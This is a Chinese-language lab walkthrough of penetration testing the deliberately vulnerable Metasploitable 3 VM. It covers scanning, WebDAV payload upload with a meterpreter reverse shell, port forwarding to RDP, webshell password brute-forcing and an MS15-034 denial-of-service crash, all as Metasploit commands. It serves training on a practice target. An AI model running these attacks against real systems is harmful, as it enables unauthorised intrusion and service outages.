Metasploitable 3 渗透测试实战

Metasploitable 3简介

Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要手工挖掘。但是还没完,Metasploitable 3 加入了 flag。这样大家就可以在里面开开心心的玩 CTF 啦!

百度网盘:链接:http://pan.baidu.com/s/1geDBBQN密码:aoqc

初始化环境

信息收集

nmap对靶机进行扫描:

nmap -p-  -sS -sV -n -v --reason --open -oX demon.xml  10.10.9.102

-sS Tcp SYN Scan (sS)这是一个基本的扫描方式,它被称为半开放扫描 ,Nmap发送SYN包到远程主机,但是它不会产生任何会话.因此不会在目标主机上产生任何日志记录,因为没有形成会话

-sV版本检测是用来扫描目标主机和端口上运行的软件的版本

--open仅仅显示开启的端口

--reason显示端口处于特殊状态

-n不进行dns解析操作 (本地搭建环境,不用dns解析)

-oX XML XML格式 (我们需要导入到metasploit里面,以便我们更好的下次查看)

msfconsole中创建工作环境并导入扫描结果:

msf > workspace -a win08-r2

msf > workspace win08-r2

msf > db_import demon.xml

msf > services

nmap扫描结果

端口与服务验证

80端口
8022端口
8282端口
8585端口

漏洞分析、渗透攻击、后渗透攻击

1)WebDAV服务漏洞

WebDAV是基于Web服务的扩展服务。它允许用户像操作本地文件一样,操作服务器上的文件。借助该功能,用户很方便的在网络上存储自己的文件。为了方便用户使用,通常会提供给用户较大的文件权限,如上传、修改甚至是执行权限。Kali Linux提供了一款WebDAV服务漏洞利用工具DAVTest。该工具会自动检测权限,寻找可执行文件的权限。一旦发现,用户就可以上传内置的后门工具,对服务器进行控制。同时,该工具可以上传用户指定的文件,便于后期利用。

DAVTest说明: 

DAVTest上传测试的可执行文件,然后(可选)上传文件,允许用于执行命令,或者直接在目标上其他操作测试启用的WebDAV服务器。它的目的是渗透测试快速,轻松地确定是否启用DAV服务攻击。

DAVTest支持: 

自动发送文件漏洞

目录自动随机帮助隐藏文件

发送文本文件,并尝试MOVE到可执行文件的名称

上传的文件自动清理

发送任意文件

可上传文件类型
可执行目录

生成攻击载荷并上传:

生成payload
上传成功

开始渗透测试:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter

msf5 exploit(multi/handler) > set LHOST 10.10.9.108

msf5 exploit(multi/handler) > set LPORT 8888

msf5 exploit(multi/handler) > exploit

getshell成功

尝试建立远程桌面连接:

meterpreter > portfwd add -l 888 -p 3389 -r 10.10.9.102

在kali主机上尝试连接:

2)SSH测试:

ssh -L 3389:localhost:3389 [email protected]

利用ssh 来做一个端口转发强制开启3389端口,服务器本身就有防火墙,在nmap也扫不到。

在kali上尝试连接:

连接成功

3)尝试连接中国菜刀

一句话木马地址(但不知道连接密码)

msf > search caidao

msf > use auxiliary/scanner/http/caidao_bruteforce_login

msf auxiliary(scanner/http/caidao_bruteforce_login) > set RHOSTS 10.10.9.102

msf auxiliary(scanner/http/caidao_bruteforce_login) > set TARGETURI /caidao.asp

msf auxiliary(scanner/http/caidao_bruteforce_login) > run

[-] 192.168.56.101:80 - Failed: '123456789'

[+] 192.168.56.101:80 - Success: 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

找到连接口令‘password’

4)80端口--http

MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞(远程蓝屏代码)

微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012

R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响

msf > search ms15_034

msf > use auxiliary/dos/http/ms15_034_ulonglongadd

msf auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 10.10.9.102

触发蓝屏:

Metasploitable 3相对于于ubuntun版的Metasploitable 2(个人理解是metasploit操作实验),内置一些安全机制,比如防火墙,权限设置等,是一个很不错的靶场,假如还有其他好玩点请师傅们多多指教!

你可能感兴趣的:(Metasploitable 3 渗透测试实战)